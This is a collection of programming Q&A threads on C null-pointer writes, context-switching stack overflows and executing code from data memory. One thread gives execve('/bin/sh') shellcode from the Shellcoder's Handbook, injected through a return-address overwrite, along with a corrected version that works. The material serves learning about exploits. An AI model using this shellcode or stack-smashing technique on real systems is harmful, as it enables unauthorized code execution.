In the following piece of code, what does *(int32 *) 0 = 0; mean?
void
function (void)
{
...
for (;;)
*(int32 *) 0 = 0; /* What does this line do? */
}
A few notes:
The code seems to not be reachable, as there is an exit statement before that particular piece of code.
int32 is typedef'ed but you shouldn't care too much about it.
This piece of code is from a language's runtime in a compiler, for anyone interested.
The code is doing the following:
for (;;) // while(true)
*(int32 *) 0 = 0; // Treat 0 as an address, de-reference the 0 address and try and store 0 into it.
This should segfault, null pointer de-reference.
EDIT
Compiled and ran for further information:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main(void){
*(int32_t *) 0 = 0;
printf("done\n");
return 0;
}
gcc -g null.c; ./a.out
Program received signal SIGSEGV, Segmentation fault.
0x00000000004004cd in main () at null.c:7
7 *(int32_t *) 0 = 0;
Since the OP states the code was written by experienced compiler engineers, it is possible this is the intent of the code:
*(int32 *) 0 = 0; is recognized by this specific C implementation as code that causes behavior not defined by the C standard and known to this implementation to be illegal.
The for (;;) additionally indicates that this code is never exited.
The compiler engineers know that the optimizer will recognize this code and deduce that it may be “optimized away”, because any program that reaches this code is permitted to have any behavior, so the optimizer may choose to give it the behavior as if the code is never reached.1
This sort of reasoning is possible only if you have specific knowledge of the internal operation of a C implementation. It is the sort of thing a compiler engineer might include in special headers for a C implementation, perhaps to mark that certain code (such as code after an abort call) is never reached. It should never be used in normal programming.
1 For example, consider this code:
if (a)
for (;;)
*(int 32 *) 0 = 0;
else
foo();
The compiler can recognize that the then-clause is permitted to have any behavior. Therefore, the compiler is free to choose what behavior it has. For simplicity, it chooses it to have the same behavior as foo();. Then the code becomes:
if (a)
foo();
else
foo();
and can be further simplified to:
foo();
In fact that this code seg-faulting doesn't explain why it's exists =)
I think that's from runtime of some MCU.. and reason it is there because if program execution will get to this point such instruction will either initiate software reset for an MCU, so program will be restarted (which is common practice in embedded development) OR if MCU configured with hardware watchdog, force MCU restart because of hardware watchdog and never ending loop.
Main goal of such constructions to invoke an interrupt which can be handled either by OS or by hardware for initiate certain actions.
Knowing that its x86 it will depend on a CPU mode... in Real Mode nothing will really happened instantly if there is no watchdog, at address 0 there is an address of 'divide by 0' handler, so if it's some old MS-DOS or embedded x86 runtime it will change an address of the 'Divide by 0' handler to 0, so as soon as it happens and this interrupt is not masked CPU will jump to location 0:0 and probably will just restart because of illegal instruction.. if it's protected or VM x86 code then it's a way to notify OS or any other supervisor that there is a problem in runtime and software should be 'killed' externally.
for(;;) is equivalent to while(1),
*(int32 *) 0 = 0;writes 0 to a dereferenced null pointer, which is expected to cause a crash, but actually won't at all times on certain compilers: Crashing threads with *(int*)NULL = 1; problematic?
It's an infinite loop of undefined behavior (dereferencing a null pointer). It's likely to crash with a segfault on *n*x or Access Violation on Windows.
Mike's comment is pretty well correct: it's storing the VALUE zero at the ADDRESS 0.
Which will be a crash on most machines.
The original IBM PC stored the interrupt vector table in the lowest 1 KiB of memory. Hence actually writing a 32-bit value to the address 0 on such an architecture would overwrite the address for INT 00h. INT 00h looks unused in the PC.
On basically anything modern (meaning in x86/x86-64 parlace anything running in protected or long mode), it will trigger a segmentation fault unless you are in ring 0 (kernel mode) because you are stepping outside of your process' allowed address dereference range.
As the dereference is undefined behavior (as already stated), a segmentation fault is a perfectly acceptable way to handle that situation. If you know that on the target architecture a zero address dereference causes a segmentation fault, it's seems to be a pretty sure way to get the application to crash. If exit() returns, that's probably what you want to do, since something just went horribly wrong. That the code is from a particular compiler's runtime means whoever wrote it can take advantage of knowledge of the internal workings of the compiler and runtime, as well as tailor it to the specific target architecture's behavior.
It could be that the compiler doesn't know exit() doesn't return, but it does know this construct does not return.
Related
I was working on a project for a course on Operating Systems. The task was to implement a library for dealing with threads, similar to pthreads, but much more simpler. The purpose of it is to practice scheduling algorithms. The final product is a .a file. The course is over and everything worked just fine (in terms of functionality).
Though, I got curious about an issue I faced. On three different functions of my source file, if I add the following line, for instance:
fprintf(stderr, "My lucky number is %d\n", 4);
I get a segmentation fault. The same doesn't happen if stdout is used instead, or if the formatting doesn't contain any variables.
That leaves me with two main questions:
Why does it only happen in three functions of my code, and not the others?
Could the creation of contexts using getcontext() and makecontext(), or the changing of contexts using setcontext() or swapcontext() mess up with the standard file descriptors?
My intuition says those functions could be responsible for that. Even more when given the fact that the three functions of my code in which this happens are functions that have contexts which other parts of the code switch to. Usually by setcontext(), though swapcontext() is used to go to the scheduler, for choosing another thread to execute.
Additionally, if that is the case, then:
What is the proper way to create threads using those functions?
I'm currently doing the following:
/*------------------------------------------------------------------------------
Funct: Creates an execution context for the function and arguments passed.
Input: uc -> Pointer where the context will be created.
funct -> Function to be executed in the context.
arg -> Argument to the function.
Return: If the function succeeds, 0 will be returned. Otherwise -1.
------------------------------------------------------------------------------*/
static int create_context(ucontext_t *uc, void *funct, void *arg)
{
if(getcontext(uc) != 0) // Gets a context "model"
{
return -1;
}
stack_t *sp = (stack_t*)malloc(STACK_SIZE); // Stack area for the execution context
if(!sp) // A stack area is mandatory
{
return -1;
}
uc->uc_stack.ss_sp = sp; // Sets stack pointer
uc->uc_stack.ss_size = STACK_SIZE; // Sets stack size
uc->uc_link = &context_end; // Sets the context to go after execution
makecontext(uc, funct, 1, arg); // "Makes everything work" (can't fail)
return 0;
}
This code is probably a little modified, but it is originally an online example on how to use u_context.
Assuming glibc, the explanation is that fprintf with an unbuffered stream (such as stderr by default) internally creates an on-stack buffer which as a size of BUFSIZE bytes. See the function buffered_vfprintf in stdio-common/vfprintf.c. BUFSIZ is 8192, so you end up with a stack overflow because the stack you create is too small.
I have the following code which is supposed to drop a shell, however, after I run the code nothing appears to happen. Here is the code that I have. This was taken from the shellcoder's handbook.
`
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}`
I compile it using gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
When I run it the following happens.
The expected result is the following.
Here is the code that produces the above results:
int main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
I am not sure why this is happening. I am using Ubuntu on Windows 10. This might not effect my results but I have disabled ASLR. That might be an issue. I have not tried this on a VM just yet. I wanted to try and figure out why this is not working before I did that. If this is unclear please let me know and I will be happy to clarify any details.
I appreciate all of your help in advance.
--UPDATE--
I was able to get the assembly instructions from the shellcode I provided.
Does anyone see any issues that would cause a shell not to be dropped?
With the help of a colleague we were able to figure out why the shellcode was not executing. The shellcode is fine, the issue was actually an update to the gcc compiler which changes how the prolog/epilog are handled when code executes. When a program starts, the compiler-generated code puts the return address on the stack, but it does so using a new pattern. The executing program no longer uses the return addresses directly by popping it into the instruction pointer (IP). Instead, it pops the stack value into %ecx and then uses the contents at the address %ecx-4 (for 32-bit machines) as the return address. Therefore, the way I was trying to do it was never going to work even with the protections turned off. This behavior only affects main() and not functions called by main. So a simple solution would be to place the contents of main into another function foo() and call foo() from main() as depicted below.
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void foo()
{
int *ret;
ret = (int *)&ret + 4;
(*ret) = (int)shellcode;
}
int main()
{
foo();
}
Here is a question that is related to this answer.
Understanding new gcc prologue
There are couple of things that could go wrong here:
The store of the shell code address is optimized away because it is derived from a stack variable, and nothing reads from the stack afterwards.
The store is optimized away because it is out of bounds.
The offset calculation from the local variable is wrong, so the shellcode address does not overwrite the return address. (This is what happens when I compile your example.)
The execution is redirect, but the shellcode does not run because it is located in the non-executable .data segment. (That would cause the process to terminate with a signal, though).
This question already has answers here:
How to write self-modifying code in x86 assembly
(7 answers)
Closed 6 years ago.
Is there any way to put processor instructions into array, make its memory segment executable and run it as a simple function:
int main()
{
char myarr[13] = {0x90, 0xc3};
(void (*)()) myfunc = (void (*)()) myarr;
myfunc();
return 0;
}
On Unix (these days, that means "everything except Windows and some embedded and mainframe stuff you've probably never heard of") you do this by allocating a whole number of pages with mmap, writing the code into them, and then making them executable with mprotect.
void execute_generated_machine_code(const uint8_t *code, size_t codelen)
{
// in order to manipulate memory protection, we must work with
// whole pages allocated directly from the operating system.
static size_t pagesize;
if (!pagesize) {
pagesize = sysconf(_SC_PAGESIZE);
if (pagesize == (size_t)-1) fatal_perror("getpagesize");
}
// allocate at least enough space for the code + 1 byte
// (so that there will be at least one INT3 - see below),
// rounded up to a multiple of the system page size.
size_t rounded_codesize = ((codelen + 1 + pagesize - 1)
/ pagesize) * pagesize;
void *executable_area = mmap(0, rounded_codesize,
PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0);
if (!executable_area) fatal_perror("mmap");
// at this point, executable_area points to memory that is writable but
// *not* executable. load the code into it.
memcpy(executable_area, code, codelen);
// fill the space at the end with INT3 instructions, to guarantee
// a prompt crash if the generated code runs off the end.
// must change this if generating code for non-x86.
memset(executable_area + codelen, 0xCC, rounded_codesize - codelen);
// make executable_area actually executable (and unwritable)
if (mprotect(executable_area, rounded_codesize, PROT_READ|PROT_EXEC))
fatal_perror("mprotect");
// now we can call it. passing arguments / receiving return values
// is left as an exercise (consult libffi source code for clues).
((void (*)(void)) executable_area)();
munmap(executable_area, rounded_codesize);
}
You can probably see that this code is very nearly the same as the Windows code shown in cherrydt's answer. Only the names and arguments of the system calls are different.
When working with code like this, it is important to know that many modern operating systems will not allow you to have a page of RAM that is simultaneously writable and executable. If I'd written PROT_READ|PROT_WRITE|PROT_EXEC in the call to mmap or mprotect, it would fail. This is called the W^X policy; the acronym stands for Write XOR eXecute. It originates with OpenBSD, and the idea is to make it harder for a buffer-overflow exploit to write code into RAM and then execute it. (It's still possible, the exploit just has to find a way to make an appropriate call to mprotect first.)
Depends on the platform.
For Windows, you can use this code:
// Allocate some memory as readable+writable
// TODO: Check return value for error
LPVOID memPtr = VirtualAlloc(NULL, sizeof(myarr), MEM_COMMIT, PAGE_READWRITE);
// Copy data
memcpy(memPtr, myarr, sizeof(myarr);
// Change memory protection to readable+executable
// Again, TODO: Error checking
DWORD oldProtection; // Not used but required for the function
VirtualProtect(memPtr, sizeof(myarr), PAGE_EXECUTE_READ, &oldProtection);
// Assign and call the function
(void (*)()) myfunc = (void (*)()) memPtr;
myfunc();
// Free the memory
VirtualFree(memPtr, 0, MEM_RELEASE);
This codes assumes a myarr array as in your question's code, and it assumes that sizeof will work on it i.e. it has a directly defined size and is not just a pointer passed from elsewhere. If the latter is the case, you would have to specify the size in another way.
Note that here there are two "simplifications" possible, in case you wonder, but I would advise against them:
1) You could call VirtualAlloc with PAGE_EXECUTE_READWRITE, but this is in general bad practice because it would open an attack vector for unwanted code exeuction.
2) You could call VirtualProtect on &myarr directly, but this would just make a random page in your memory executable which happens to contain your array executable, which is even worse than #1 because there might be other data in this page as well which is now suddenly executable as well.
For Linux, I found this on Google but I don't know much about it.
Very OS-dependent: not all OSes will deliberately (read: without a bug) allow you to execute code in the data segment. DOS will because it runs in Real Mode, Linux can also with the appropriate privileges. I don't know about Windows.
Casting is often undefined and has its own caveats, so some elaboration on that topic here. From C11 standard draft N1570, §J.5.7/1:
A pointer to an object or to void may
be cast to a pointer to a function, allowing data to be invoked as a
function (6.5.4).
(Formatting added.)
So, it's perfectly fine and should work as expected. Of course, you would need to cohere to the ABI's calling convention.
Im trying to copy a function i have to an executable page and run it from there, but i seem to be having some problems.
Here is my code:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int foo()
{
return 4;
}
int goo()
{
return 5;
}
int main()
{
int foosize = (int)&goo-(int)&foo;
char* buf = VirtualAlloc(NULL, foosize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buf == NULL)
{
printf("Failed\n");
return 1;
}
printf("foo %x goo %x size foo %d\n", &foo, &goo, foosize);
memcpy (buf, (void*)&foo, foosize);
int(*f)() = &foo;
int ret1 = f();
printf("ret 1 %d\n", ret1);
int(*f2)() = (int(*)())&buf;
int ret2 = f2 (); // <-- crashes here
printf("ret2 %d\n", ret2);
return 0;
}
I know some of the code is technically UB ((int)&goo-(int)&foo), but it behaves fine in this case.
My question is why is this not working as expected?
It seems to me i mapped a page as executable and copied an existing function there and im just calling it.
What am i missing?
Would this behave differently on linux with mmap?
Thanks in advance
As everyone has already stated in comments, this is totally undefined behavior and should never really expect to work. However, I played with your code some with the debugger and realized the reason it's not working (at least in Cygwin gcc compiler) is you're creating f2 incorrectly to point to the the address of the pointer storing the allocated memory, namely buf. You want to point to the memory that buf points to. Therefore, your assignment should be
int(*f2)() = (int(*)())buf;
With that change, your code executes for me. But even if it works, it might break again as soon as you make any additional changes to the program.
Well I made a try of your code with MVSC 2008 in debug mode. Compiler happens to create a jmp table with relative offsets, and &foo and &goo are just entries in that table.
So even if you have successfully created an executable buffer and copied the code (much more than was useful...) the relative jump now points to a different location and (in my example) soon fell in a int 3 trap!
TL/DR: as compiler can arrange its code at will, and as many jump use relative offsets, you cannot rely on copying executable code. It is really Undefined Behaviour:
if compiler had been smart enough to just generate something like :
mov AX, 4
ret
it could have worked
if compiler has generated more complicated code with a relative jump it just breaks
Conclusion: you can only copy executable code if you have full control on the binary machine code for example if you used assembly code and know you will have no relocation problem
You need to declare foo and goo as static or will have to disable Incremental Linking.
Incremental linking is used to shorten the linking time when building your applications, the difference between normally and incrementally linked executables is that in incrementally linked ones each function call goes through an extra JMP instruction emitted by the linker.
These JMPs allow the linker to move the functions around in memory without updating all the CALL instructions that reference the function. But it's exactly this JMP that causes problems in your case. Declaring a function as static prevents the linker from creating this extra JMP instruction.
I want to take a piece of code, copy it into a global array and execute it from there.
In other words, I am trying to to copy a bunch of instructions from the code-section into the data-section, and then set the program-counter to continue the execution of the program from the data-section.
Here is my code:
#include <stdio.h>
#include <string.h>
typedef void(*func)();
static void code_section_func()
{
printf("hello");
}
#define CODE_SIZE 73
// I verified this size in the disassembly of 'code_section_func'
static long long data[(CODE_SIZE-1)/sizeof(long long)+1];
// I am using 'long long' in order to obtain the maximum alignment
int main()
{
func data_section_func = (func)data;
memcpy((void*)data_section_func,(void*)code_section_func,CODE_SIZE);
data_section_func();
return 0;
}
I might have been naive thinking it could work, so I'd be happy to get an explanation why it didn't.
For example, after a program is loaded into memory, does the MMU restrict instruction-fetching to a specific area within the memory address space of the process (i.e., the code-section of the program)?
For the protocol, I have tested this with VS2013 compiler over a 64-bit OS and an x64-based processor.
Thanks
Windows (and many other modern OSes) by default sets the data section as read/write/no-execute, so attempting to "call" a data object will fail.
Instead, you should VirtualAlloc a chunk of memory with the PAGE_EXECUTE_READWRITE protection. Note, it may be necessary to use FlushInstructionCache to ensure the newly-copied code is executed.